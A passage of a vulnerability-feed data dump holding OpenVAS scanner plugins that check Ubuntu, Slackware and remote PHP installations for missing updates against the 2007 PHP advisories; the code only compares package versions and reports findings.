isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.0.5-2ubuntu1.8\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:29:04", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-424-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840061", "id": "OPENVAS:840061", "title": "Ubuntu Update for php5 vulnerabilities USN-424-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_424_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for php5 vulnerabilities USN-424-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple buffer overflows have been discovered in various PHP modules.\n If a PHP application processes untrusted data with functions of the\n session or zip module, or various string functions, a remote attacker\n could exploit this to execute arbitrary code with the privileges of\n the web server. (CVE-2007-0906)\n\n The sapi_header_op() function had a buffer underflow that could be\n exploited to crash the PHP interpreter. (CVE-2007-0907)\n \n The wddx unserialization handler did not correctly check for some\n buffer boundaries and had an uninitialized variable. By unserializing\n untrusted data, this could be exploited to expose memory regions that\n were not meant to be accessible. Depending on the PHP application this\n could lead to disclosure of potentially sensitive information.\n (CVE-2007-0908)\n \n On 64 bit systems (the amd64 and sparc platforms), various print\n functions and the odbc_result_all() were susceptible to a format\n string vulnerability. A remote attacker could exploit this to execute\n arbitrary code with the privileges of the web server. (CVE-2007-0909)\n \n Under certain circumstances it was possible to overwrite superglobal\n variables (like the HTTP GET/POST arrays) with crafted session data.\n (CVE-2007-0910)\n \n When unserializing untrusted data on 64-bit platforms the\n zend_hash_init() function could be forced to enter an infinite loop,\n consuming CPU resources, for a limited length of time, until the\n script timeout alarm aborts the script. (CVE-2007-0988)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-424-1\";\ntag_affected = \"php5 vulnerabilities on Ubuntu 5.10 ,\n Ubuntu 6.06 LTS ,\n Ubuntu 6.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-424-1/\");\n script_id(840061);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:55:18 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"424-1\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_name( \"Ubuntu Update for php5 vulnerabilities USN-424-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.2-1ubuntu3.5\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysqli\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.1.6-1ubuntu2.2\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU5.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.0.5-2ubuntu1.7\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:33", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2007-053-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58066", "id": "OPENVAS:58066", "title": "Slackware Advisory SSA:2007-053-01 php", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_053_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 10.2 and 11.0 to improve the\nstability and security of PHP. Quite a few bugs were fixed -- please\nsee http://www.php.net for a detailed list. All sites that use PHP are\nencouraged to upgrade. Please note that we haven't tested all PHP\napplications for backwards compatibility with this new upgrade, so you\nshould have the old package on hand just in case.\n\nBoth PHP 4.4.5 and PHP 5.2.1 updates have been provided.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2007-053-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-053-01\";\n \nif(description)\n{\n script_id(58066);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2007-053-01 php \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:04", "bulletinFamily": "scanner", "description": "PHP 5.2.0 and prior versions are prone to multiple security\n vulnerabilities. Successful exploits could allow an attacker to write\n files in unauthorized locations, cause a denial-of-service condition,\n and potentially execute code.", "modified": "2019-03-01T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:1361412562310100606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100606", "title": "PHP 5.2.0 and Prior Versions Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_php_22496.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# PHP 5.2.0 and Prior Versions Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100606\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 13:12:25 +0200 (Fri, 23 Apr 2010)\");\n script_bugtraq_id(22496);\n script_cve_id(\"CVE-2007-0905\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\");\n script_name(\"PHP 5.2.0 and Prior Versions Multiple Vulnerabilities\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/22496\");\n script_xref(name:\"URL\", value:\"http://support.avaya.com/elmodocs2/security/ASA-2007-136.htm\");\n script_xref(name:\"URL\", value:\"http://www.php.net/ChangeLog-5.php#5.2.1\");\n script_xref(name:\"URL\", value:\"http://www.php.net/releases/5_2_1.php\");\n script_xref(name:\"URL\", value:\"http://support.avaya.com/elmodocs2/security/ASA-2007-101.htm\");\n script_xref(name:\"URL\", value:\"http://rhn.redhat.com/errata/RHSA-2007-0076.html\");\n script_xref(name:\"URL\", value:\"http://rhn.redhat.com/errata/RHSA-2007-0081.html#Red%20Hat%20Linux%20Advanced%20Workstation%202.1%20for%20the%20Itanium%20Processor\");\n script_xref(name:\"URL\", value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\");\n script_xref(name:\"URL\", value:\"http://rhn.redhat.com/errata/RHSA-2007-0089.html\");\n script_xref(name:\"URL\", value:\"http://www.novell.com/linux/security/advisories/2007_44_php.html\");\n\n script_tag(name:\"affected\", value:\"These issues are reported to affect PHP 4.4.4 and prior versions in\n the 4 branch, and 5.2.0 and prior versions in the 5 branch. Other versions may also be vulnerable.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates to address these issues. Contact the\n vendor for details on obtaining and applying the appropriate updates.\n\n Please see the advisories for more information.\");\n\n script_tag(name:\"summary\", value:\"PHP 5.2.0 and prior versions are prone to multiple security\n vulnerabilities. Successful exploits could allow an attacker to write\n files in unauthorized locations, cause a denial-of-service condition,\n and potentially execute code.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"4\", test_version2:\"4.4.4\" ) ||\n version_in_range( version:vers, test_version:\"5\", test_version2:\"5.2.0\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.4.5/5.2.1\" );\n security_message( data:report, port:port );\n exit( 0 